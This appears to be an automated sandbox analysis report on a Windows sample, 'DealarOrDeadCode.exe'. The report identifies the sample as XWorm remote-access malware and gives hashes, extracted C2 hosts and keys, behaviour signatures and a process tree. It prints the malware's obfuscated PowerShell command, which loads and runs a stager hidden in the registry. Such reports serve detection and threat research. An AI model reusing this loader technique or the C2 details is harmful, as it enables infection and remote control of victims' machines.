Analysis
-
max time kernel
150s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
19-09-2024 06:26
Static task
static1
Behavioral task
behavioral1
Sample
DealarOrDeadCode.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
DealarOrDeadCode.exe
Resource
win10v2004-20240802-en
General
-
Target
DealarOrDeadCode.exe
-
Size
500KB
-
MD5
e1c82191b678cea8f3c996887ddc1232
-
SHA1
7946006ca278892817b7a778eea1e04f5b2f948c
-
SHA256
bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40
-
SHA512
cb1499db7c1a7b3c4436d02a1218a055f9c04d7b4ae2ca01fd179a6bdb74c30c8cda1ffda8b61dcc3397b97351b77d683295cb46701a614cf7341906bd807804
-
SSDEEP
12288:kU43i+9MrOq5q7pN37VvbvH3pJJtlueGAmp8R6LqSY4JiFZlmM5Ki634:V4JZDhAWS2ZN
Malware Config
Extracted
xworm
5.0
subscribe-bond.gl.at.ply.gg:28600
tnsxJywWJMkQgZ7E
-
Install_directory
%Public%
-
install_file
Deadsvchost.exe
Extracted
xworm
3.0
updates-full.gl.at.ply.gg:60075
pPl3jDvgHvU1lllp
-
Install_directory
%LocalAppData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0009000000012119-7.dat family_xworm behavioral1/memory/1772-12-0x0000000001210000-0x0000000001220000-memory.dmp family_xworm behavioral1/files/0x0034000000016140-15.dat family_xworm behavioral1/memory/1928-23-0x0000000001010000-0x0000000001020000-memory.dmp family_xworm -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2688 created 432 2688 powershell.EXE 5 -
Executes dropped EXE 3 IoCs
pid Process 1772 DeadXClient.exe 1928 DeadROOTkit.exe 2920 DeadCodeRootKit.exe -
pid Process 2688 powershell.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2688 set thread context of 2660 2688 powershell.EXE 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DeadCodeRootKit.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0e446e95c0adb01 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2688 powershell.EXE 2688 powershell.EXE 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe 2660 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1188 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1772 DeadXClient.exe Token: SeDebugPrivilege 1928 DeadROOTkit.exe Token: SeDebugPrivilege 2688 powershell.EXE Token: SeDebugPrivilege 2688 powershell.EXE Token: SeDebugPrivilege 2660 dllhost.exe Token: SeAuditPrivilege 860 svchost.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 2220 wrote to memory of 1772 2220 DealarOrDeadCode.exe 30 PID 2220 wrote to memory of 1772 2220 DealarOrDeadCode.exe 30 PID 2220 wrote to memory of 1772 2220 DealarOrDeadCode.exe 30 PID 2220 wrote to memory of 1928 2220 DealarOrDeadCode.exe 31 PID 2220 wrote to memory of 1928 2220 DealarOrDeadCode.exe 31 PID 2220 wrote to memory of 1928 2220 DealarOrDeadCode.exe 31 PID 2220 wrote to memory of 2920 2220 DealarOrDeadCode.exe 32 PID 2220 wrote to memory of 2920 2220 DealarOrDeadCode.exe 32 PID 2220 wrote to memory of 2920 2220 DealarOrDeadCode.exe 32 PID 2220 wrote to memory of 2920 2220 DealarOrDeadCode.exe 32 PID 2836 wrote to memory of 2688 2836 taskeng.exe 34 PID 2836 wrote to memory of 2688 2836 taskeng.exe 34 PID 2836 wrote to memory of 2688 2836 taskeng.exe 34 PID 2688 wrote to memory of 2660 2688 powershell.EXE 36 PID 2688 wrote to memory of 2660 2688 powershell.EXE 36 PID 2688 wrote to memory of 2660 2688 powershell.EXE 36 PID 2688 wrote to memory of 2660 2688 powershell.EXE 36 PID 2688 wrote to memory of 2660 2688 powershell.EXE 36 PID 2688 wrote to memory of 2660 2688 powershell.EXE 36 PID 2688 wrote to memory of 2660 2688 powershell.EXE 36 PID 2688 wrote to memory of 2660 2688 powershell.EXE 36 PID 2688 wrote to memory of 2660 2688 powershell.EXE 36 PID 2660 wrote to memory of 432 2660 dllhost.exe 5 PID 2660 wrote to memory of 480 2660 dllhost.exe 6 PID 2660 wrote to memory of 488 2660 dllhost.exe 7 PID 2660 wrote to memory of 496 2660 dllhost.exe 8 PID 2660 wrote to memory of 608 2660 dllhost.exe 9 PID 2660 wrote to memory of 684 2660 dllhost.exe 10 PID 2660 wrote to memory of 768 2660 dllhost.exe 11 PID 2660 wrote to memory of 820 2660 dllhost.exe 12 PID 2660 wrote to memory of 860 2660 dllhost.exe 13 PID 2660 wrote to memory of 976 2660 dllhost.exe 15 PID 2660 wrote to memory of 280 2660 dllhost.exe 16 PID 2660 wrote to memory of 344 2660 dllhost.exe 17 PID 2660 wrote to memory of 1072 2660 dllhost.exe 18 PID 2660 wrote to memory of 1120 2660 dllhost.exe 19 PID 2660 wrote to memory of 1160 2660 dllhost.exe 20 PID 2660 wrote to memory of 1188 2660 dllhost.exe 21 PID 2660 wrote to memory of 1664 2660 dllhost.exe 23 PID 2660 wrote to memory of 1048 2660 dllhost.exe 24 PID 2660 wrote to memory of 1796 2660 dllhost.exe 25 PID 2660 wrote to memory of 2424 2660 dllhost.exe 26 PID 2660 wrote to memory of 2456 2660 dllhost.exe 27 PID 2660 wrote to memory of 1772 2660 dllhost.exe 30 PID 2660 wrote to memory of 1928 2660 dllhost.exe 31 PID 2660 wrote to memory of 2836 2660 dllhost.exe 33 PID 2660 wrote to memory of 2688 2660 dllhost.exe 34 PID 2660 wrote to memory of 2940 2660 dllhost.exe 35
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:432
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6d1f95af-ddd4-4ca3-8f04-eec7ba8a1f09}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2660
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:608
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:1664
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1796
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:684
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Modifies security service
PID:768
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:820
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1160
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
PID:860 -
C:\Windows\system32\taskeng.exetaskeng.exe {E4ABBE5F-F185-4F02-B08C-ECAFE38E57D8} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](68)+''+'e'+''+'a'+'d'+[Char](115)+''+'t'+'a'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2688
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:976
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:280
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:344
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1072
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1120
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1048
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2424
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2456
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1188 -
C:\Users\Admin\AppData\Local\Temp\DealarOrDeadCode.exe"C:\Users\Admin\AppData\Local\Temp\DealarOrDeadCode.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Users\Public\DeadXClient.exe"C:\Users\Public\DeadXClient.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Users\Public\DeadROOTkit.exe"C:\Users\Public\DeadROOTkit.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Users\Public\DeadCodeRootKit.exe"C:\Users\Public\DeadCodeRootKit.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2920
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2087154537-1745831706-130511666-5654344211999590812-1174689362-440058154491061091"1⤵PID:2940
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD5b8479a23c22cf6fc456e197939284069
SHA1b2d98cc291f16192a46f363d007e012d45c63300
SHA25618294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4
-
Filesize
42KB
MD57dd98fc2976ee270a278e1a9a28eefae
SHA10497ee045226b2d310c7678ed055eeedbc88dc77
SHA2565711b50667b4de000c8031724427ec6cd00b41b760ca1608421dc47b549e2093
SHA51294cab0f684f79e7adb6bea43a909d9621a2ef6bf223fbf4650b040766e7edfc95d77f62aa852efccb7752442e96182329934eee58ad4b8f579a75bd8414d984c
-
Filesize
35KB
MD5f1976ea02bffaef5ac943c2abbb7426c
SHA1deeee7d4f336d0ba898b5579720aaf630951a72f
SHA2564353e37a3d60dd30beeec61a812a07ba6bfc174a18cdd5a95be98666db2f7cf6
SHA5122b21c93ee09865a5c5f365cb945ebc2473a5b8ddce009302e8f03815d7784ad3a95d615678b3b49e272d235d10c03262f2ddaaec9de8a373c0487b7904bd7858